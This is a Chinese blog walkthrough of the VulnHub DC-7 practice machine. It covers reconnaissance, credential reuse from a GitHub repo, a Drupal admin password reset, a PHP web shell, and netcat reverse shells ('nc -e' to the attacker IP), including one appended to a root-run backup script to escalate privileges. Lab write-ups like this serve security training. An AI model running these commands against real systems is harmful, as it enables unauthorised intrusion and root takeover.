DC-7靶机渗透测试详细教程

最新推荐文章于 2024-04-03 20:14:06 发布
最新推荐文章于 2024-04-03 20:14:06 发布
阅读量1k 收藏 3
点赞数
分类专栏: VulnHub靶场通关教程 文章标签: 渗透测试 网络安全 DC-7靶机 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34028816/article/details/124572886
版权

DC-7

攻击者kali:192.168.1.11

受害者DC-7:192.168.1.12

通过arp-sacn -l 扫描到DC-7的IP地址

使用namp扫描DC-7

nmap -sS -A -p- 192.168.1.12

发现有22和80端口

访问一下80

打开首页就直接提醒我们暴力破解是没有用的,跳出框外思考

网页右下角有个@DC7USER

百度一下

GitHub有这个

有个项目的源码,点击进去看看

配置文件里的数据库用户名账号正好是dc7user还有数据库的密码

尝试用这个账号连接ssh

连接成功!

提醒我们又封邮箱

查看一下

backups备份的意思,可能是个备份脚本,去查看一下

而且这脚本还是有权限执行的

尝试加提权命令看看

不行,不允许添加

貌似这脚本好像提示着什么

进入到/var/www/html下

drush user-password admin --password="demon"

修改管理员密码

去web页面登录一下

需要去下载php插件

php 8.x-1.x-dev | Drupal.org

下载好后上传

安装成功

点击Enable newly added modules激活模块

点击前面的三角将前几栏折回,找到PHP Filetr够选

并且点击install

安装成功

这里可以新建内容

尝试写入一句话木马,选着PHP,点击保存

显示页面

复制链接尝试用蚁剑连接看看

连接成功

进入终端反弹shell

kali端先监听

nc -lvnp 4444

蚁剑终端

nc -e /bin/sh 192.168.1.11 4444

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

提权想到之前那个脚本

有权限

kali再监听一个端口

nc -lvnp 6666

将反弹shell写入脚本

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

然后再执行脚本

提权到root

DC-7总结

nmap扫描

注意站点信息,站外信息收集查询,查到GitHub上的源码,发现数据库账号密码

尝试进行ssh远程登录,发现邮箱,发现备份脚本的作用

修改web页面admin账号的密码登录到web界面

安装PHP插件

添加一句话木马php页面

蚁剑连接,shell反弹到kali

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

修改备份脚本,并且执行,拿到root权限

啊醒
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2432
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
渗透测试DC-7靶机
Ciyaso的博客
08-23 252
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
Neos的渗透测试靶机练习——DC-7(1),2024最新网络安全面试笔试
最新发布
2301_76223624的博客
04-03 720
我们已经渐入佳境,因为我们用到了很多之前渗透所用的姿势,慢慢的,渗透测试会成为一种体力活,而不是技术活。当然了,对于现在,每一次新的渗透都是一堆没学过的新的知识,希望大家能知其然,亦知其所以然,渗透结束了,可是其中大量的为什么需要你私下去思考并解决,学的只是思路,但是为什么这个思路,为什么用这个工具,还需要多多琢磨。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
靶机DC-7
weixin_43940853的博客
12-09 298
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
DC-7靶机渗透测试
读书 买花 长大
04-30 342
DC-7
DC-7靶机渗透
m0_62008601的博客
06-02 996
dc-7靶机的渗透过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC7-靶机
Au
11-30 1648
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
DC-7靶机
m0_62094846的博客
07-05 221
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
DC7靶机渗透测试
Huangshanyoumu的博客
04-17 301
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞扫描/利用1.访问靶机 web 服务2.信息收集3.ssh 连接4.查看文件权限5.查看文件内容7.利用框架漏洞8.安装 PHP 插件10.漏洞利用总结: 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-7(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 发现靶机 ip:192.168.1.126 2.端口扫描 发现其开放了 22 ssh、80 web drupal 二、漏洞扫描/利用 1.
DC系列(7)DC-7渗透测试
Nikris的博客
01-12 2985
DC-7
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 447
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 791
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
vulnhub之DC7靶机
LainWith的博客
02-14 1451
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
靶机练习 DC-7
weixin_43705814的博客
01-23 246
渗透测试靶机练习 DC-7 一、靶机介绍 与之前的靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、搭建环境 查看靶机能否正常运行 作者提示写在最前: 如果您需要求助于暴力破解或字典攻击,您可能不会成功,也就是说断绝了暴力破解的道路。 话不多说开始渗透 三、获取Flag 1.进行主机发现发现靶机的ip并对靶机端口进行详细扫描 nmap 192.168.1.0/24 nmap -sS -sV -p- -A -O 192.168.1.100 开放了22与80
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值